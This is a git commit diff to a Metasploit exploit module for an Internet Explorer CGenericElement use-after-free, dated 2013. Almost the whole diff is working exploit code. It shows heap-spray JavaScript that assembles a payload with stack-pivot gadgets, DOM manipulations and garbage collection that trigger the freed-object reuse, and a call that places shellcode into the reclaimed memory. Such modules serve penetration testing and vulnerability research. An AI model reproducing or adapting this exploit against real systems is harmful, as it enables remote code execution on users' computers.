Land rapid7#1891, @wchen-r7's improve for ie_cgenericelement_uaf

jvazquez-r7 · jvazquez-r7 · commit 30a019e422a1 · 2013-06-03T15:35:43.000-05:00
diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -222,7 +222,6 @@ def load_exploit_html(my_target, cli)
 		<meta>
 			<?IMPORT namespace="t" implementation="#default#time2">
 		</meta>
-
 		<script>
 		#{js_mstime_malloc}
 
@@ -234,43 +233,36 @@ def load_exploit_html(my_target, cli)
 			}
 			sparkle += unescape("AB");
 			sparkle += unescape("#{js_payload}");
-
 			magenta = unescape("#{align_esp}");
-
 			for (i=0; i < 0x70/4; i++) {
 				if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
 				else               { magenta += unescape("#{align_esp}"); }
 			}
-
 			magenta += sparkle;
 
+			document.body.contentEditable="true";
 			f0 = document.createElement('span');
-			document.body.appendChild(f0);
 			f1 = document.createElement('span');
-			document.body.appendChild(f1);
 			f2 = document.createElement('span');
+			document.body.appendChild(f0);
+			document.body.appendChild(f1);
 			document.body.appendChild(f2);
-			document.body.contentEditable="true";
+			for (i=0; i < 20; i++) { document.createElement("img"); }
 			f2.appendChild(document.createElement('datalist'));
 			f1.appendChild(document.createElement('span'));
+			CollectGarbage();
 			f1.appendChild(document.createElement('table'));
-
 			try      { f0.offsetParent=null;}
 			catch(e) { }
-
 			f2.innerHTML = "";
-			f0.appendChild(document.createElement('hr'));
 			f1.innerHTML = "";
-
-			CollectGarbage();
+			f0.appendChild(document.createElement('hr'));
 			mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 		}
-
 		</script>
 		</head>
 		<body onload="eval(helloWorld());">
 		<t:ANIMATECOLOR id="myanim"/>
-
 		</body>
 		</html>
 		|
